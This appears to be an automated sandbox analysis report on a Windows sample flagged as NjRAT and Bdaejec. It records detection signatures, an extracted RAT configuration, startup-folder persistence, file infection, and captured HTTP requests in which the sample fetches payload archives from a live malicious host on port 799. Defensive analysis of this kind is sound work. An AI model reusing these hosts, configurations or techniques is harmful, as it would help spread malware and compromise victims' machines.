Windows Analysis Report
LisectAVT_2403002B_366.exe

Overview

General Information

Sample name: LisectAVT_2403002B_366.exe
Analysis ID: 1481747
MD5: 16ab569e9d84f0a2c9aacd47d4998d84
SHA1: df051511743f94a52bdbc270c4e5bf0d303d6975
SHA256: 7fb6d8e7d8bd58f1445f0c105d609bd3db7445d55d9abefc18e5e78c06b7a96f
Tags: exeWormRamnit
Infos:

Detection

Bdaejec, Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected Njrat
AI detected suspicious sample
Disables zone checking for all users
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
NjRAT RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
 https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: LisectAVT_2403002B_366.exe Avira: detected
Antivirus detection for URL or domain
Source: http://ddos.dnsnb8.net:799/cj//k3.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar86) Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarM Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarzO Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarH Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rara Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar#O Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar_ Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarPO Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar$ Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar1 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rareM Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar5 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarn Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarE Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarR Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rard Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp6 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rarx Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarM Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Notepad.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\server.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\Explower.exe Avira: detection malicious, Label: W32/Jadtre.B
Found malware configuration
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack Malware Configuration Extractor: Njrat {"Campaign ID": "HacKed", "Version": "0.7d", "Install Name": "8d9ba8e0d68a3d306883c186c2013957", "Install Dir": "Adobe Update", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Network Seprator": "|'|'|"}
Yara detected Njrat
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Notepad.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Explower.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: LisectAVT_2403002B_366.exe Joe Sandbox ML: detected

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack
Uses 32bit PE files
Source: LisectAVT_2403002B_366.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
May infect USB drives
Source: LisectAVT_2403002B_366.exe Binary or memory string: [autorun]
Source: LisectAVT_2403002B_366.exe Binary or memory string: \autorun.inf
Source: LisectAVT_2403002B_366.exe Binary or memory string: autorun.inf
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: \autorun.inf
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: [autorun]
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: autorun.inf
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00AE29E2
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_009E9998 FindFirstFileW, 4_2_009E9998
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_009F9998 FindFirstFileW, 14_2_009F9998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 15_2_00A329E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00979998 FindFirstFileW, 21_2_00979998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_005129E2
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00AE2B8C
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49711 -> 44.221.84.105:799
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep, 1_2_00AE1099
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: RRqyIX.exe, 00000001.00000003.2148360236.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 0000000F.00000003.2336903520.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527841378.0000000000A33000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000002.2611797178.0000000000513000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000003.2607592735.00000000008E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar#O
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarM
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarPO
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar_
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rard
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rareM
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarzO
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245675608.0000000000C2A000.00000004.00000010.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar5
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar86)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarE
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarM
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarR
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp6
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rara
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarx
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar$
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comDeepak
